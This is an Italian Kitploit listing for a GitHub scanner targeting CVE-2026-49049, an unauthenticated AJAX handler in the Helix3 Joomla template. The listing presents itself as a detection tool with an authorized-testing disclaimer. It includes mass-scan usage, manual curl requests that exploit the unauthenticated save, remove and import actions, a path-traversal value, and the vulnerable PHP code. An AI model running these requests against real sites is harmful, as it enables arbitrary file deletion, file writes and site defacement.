Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-49049 — Scansione di vulnerabilità in sola lettura per CVE-2026-49049 — Gestore AJAX non autenticato del plugin Helix3 per Joomla | Kitploit
Strumenti/GitHubGitHub/shinthink/cve-2026-49049
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubshinthink/cve-2026-49049

CVE-2026-49049

Scansione di vulnerabilità in sola lettura per CVE-2026-49049 — Gestore AJAX non autenticato del plugin Helix3 per Joomla

Vedi Repository
412 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Python CVE CVSS Licenza

CVE-2026-49049 — Plugin Helix3 per Joomla (JoomShaper)

Handler AJAX non autenticato — Scanner di vulnerabilità sola lettura


Panoramica

CVE-2026-49049 colpisce il framework template Helix3 per Joomla (versioni da 1.0 a 3.1.0). Il gestore onAjaxHelix3, raggiungibile tramite il dispatcher com_ajax di Joomla, non esegue alcuna autenticazione, autorizzazione o convalida CSRF su diverse azioni distruttive:

AzioneImpattoDisponibile in
saveScrive file JSON controllati dall’attaccante con path traversalTutte le versioni
removeElimina file arbitrari — nessuna restrizione su estensione o percorsoTutte le versioni
importSovrascrive i parametri del template salvati nel databaseSolo v3.x

Nota: L’azione import è stata aggiunta in Helix3 v3.x. I siti che usano v2.x sono vulnerabili solo a save e remove.

La vulnerabilità è stata scoperta da Phil Taylor (mySites.guru) e pubblicata il 29 giugno 2026.

Versioni Affette

Versione Helix3save/removeimport
1.0 – 2.xVulnerabileNon presente
3.0 – 3.1.0VulnerabileVulnerabile
3.1.1+CorrettaCorretta

Installazione

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

Utilizzo

root@kitploit:~
# Singolo target
python cve_2026_49049.py -t 192.168.1.100

# Scansione di massa
python cve_2026_49049.py -f targets.txt -o results.txt

# Con report JSON + verboso
python cve_2026_49049.py -f targets.txt --json report.json -v

Argomenti

root@kitploit:~
  -t, --target     Singolo target (dominio o IP)
  -f, --file       File con i target, uno per riga
  -o, --output     Output testuale in tempo reale (default: cve-2026-49049_scan.txt)
  --json           Report JSON strutturato (default: cve-2026-49049_report.json)
  --threads        Worker concorrenti (default: 15)
  --timeout        Timeout HTTP in secondi (default: 15)
  -v, --verbose    Mostra dettagli del probe

Prova di Concetto

Rilevamento e Convalida

Lo scanner esegue un probe di sola lettura — scrive un file JSON innocuo nella cartella layout di Helix3 tramite l’endpoint save non autenticato, ne verifica la scrittura, e poi lo elimina immediatamente tramite l’endpoint remove. Nessuna modifica persistente viene lasciata sul target.

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Scanner per Handler AJAX non autenticato di Joomla

    [*] save   — accessibile (probe: 3a9719da)
    [*] remove — accessibile (probe pulito)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s

Riproduzione Manuale

Lo scanner esegue il probe su questi endpoint esatti. Per verifica manuale:

Passo 1 — Confermare che Helix3 sia installato

root@kitploit:~
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Cercare <version>X.X.X</version>

Passo 2 — Testare l’azione save (scrittura file non autenticata)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

Passo 3 — Testare l’azione remove (eliminazione file non autenticata)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'

Passo 4 — Testare l’azione import (solo v3.x, non disponibile in v2.x)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Nota: import è stata aggiunta in Helix3 v3.x.
# I siti che eseguono v2.x restituiranno una risposta vuota per questa azione.

Meccanismo della Vulnerabilità

Nelle versioni di Helix3 precedenti alla 3.1.1, plugins/ajax/helix3/helix3.php elabora le richieste tramite onAjaxHelix3() senza alcuna protezione:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // Nessun controllo di autenticazione. Nessun token CSRF. Nessuna validazione del percorso.
    $filepath = $layoutPath . $layoutName;   // path traversal possibile

    switch ($action) {
        case 'remove':
            unlink($filepath);               // eliminazione file arbitrario
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // scrittura
            break;
    }
}

Cosa Rende Questa Vulnerabilità Pericolosa

  • Save + path traversal — layoutName=../../../somewhere/evil scrive file al di fuori della directory layout prevista
  • Remove non ha restrizioni sull’estensione — a differenza di save (che aggiunge .json), remove può colpire qualsiasi tipo di file
  • Import (v3.x) sovrascrive i parametri del database — custom_js viene renderizzata non schermata nell’output del template, abilitando l’iniezione di script su ogni pagina. Questo è il vettore utilizzato negli attacchi di defacement reali.

Disclaimer

SOLO A SCOPO EDUCATIVO E PER TEST AUTORIZZATI.

Questo software è destinato a professionisti della sicurezza che conducono penetration test autorizzati, organizzazioni che eseguono audit della propria infrastruttura e ricercatori che studiano lo sfruttamento delle vulnerabilità.

L’accesso non autorizzato a sistemi informatici è illegale e può violare:

  • Stati Uniti: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesia: UU ITE Pasal 30 & 46
  • Unione Europea: Direttiva 2013/40/UE
  • Regno Unito: Computer Misuse Act 1990

Gli autori non si assumono alcuna responsabilità per un uso improprio. Utilizzando questo software, accetti la piena responsabilità delle tue azioni.


Riferimenti

RisorsaLink
Advisory originale (mySites.guru)Helix3 3.1.1 Security Fix
Inserimento NVDCVE-2026-49049
OpenCVECVE-2026-49049
GitHub di JoomShaperRepository Helix3

Questo progetto non è affiliato a JoomShaper, Joomla o Open Source Matters, Inc.

Scarica lo strumento